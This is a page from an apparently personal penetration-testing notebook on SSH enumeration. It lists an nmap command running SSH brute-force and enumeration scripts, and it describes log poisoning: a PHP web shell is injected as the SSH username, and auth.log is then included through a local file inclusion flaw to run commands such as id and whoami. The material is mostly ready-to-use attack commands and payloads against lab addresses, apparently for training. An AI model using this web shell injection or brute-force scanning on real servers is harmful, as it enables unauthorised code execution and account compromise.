Hack$Notes
Search…
Hack$Notes
Enumeration
NMAP Scanning
Hping3 Scanning
DNS Enum
SMB Enum
SMTP Enum
POP3
SNMP Enum
LDAP Enum
HTTP Enum
FTP Enum
SSH Enum
MySQL Enum
Oracle Enum
NFS Enum
Internet Relay Chat (IRC)
Telnet
Kerberos
Finger
Ports Open/Close
ident
Postgresl
Transferring Files
Metasploit Framework
Reverse Shells
Buffer Overflow
Spawning a Shell
Password Attacks
Privilege Escalation
Port Forwarding
Tools / Techniques
Resources
Powered By
GitBook
SSH Enum
SSH Enumeration
CheckList
Probably not useful unless you uploaded key anywhere or found a private key file. Sometimes useful for log file poisoning with LFI.
Login and test SSH connectivity
ssh
[email protected]
OR
ssh
[email protected]
SSH NMAP Scripts
nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1 10.10.10.20
Code Execution through SSH/LFI
ssh '<?php system($_GET['cmd']); ?>'@10.10.10.10
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/auth.log&cmd=whoami
Previous
FTP Enum
Next
MySQL Enum
Last modified
1yr ago
Copy link
Outline
CheckList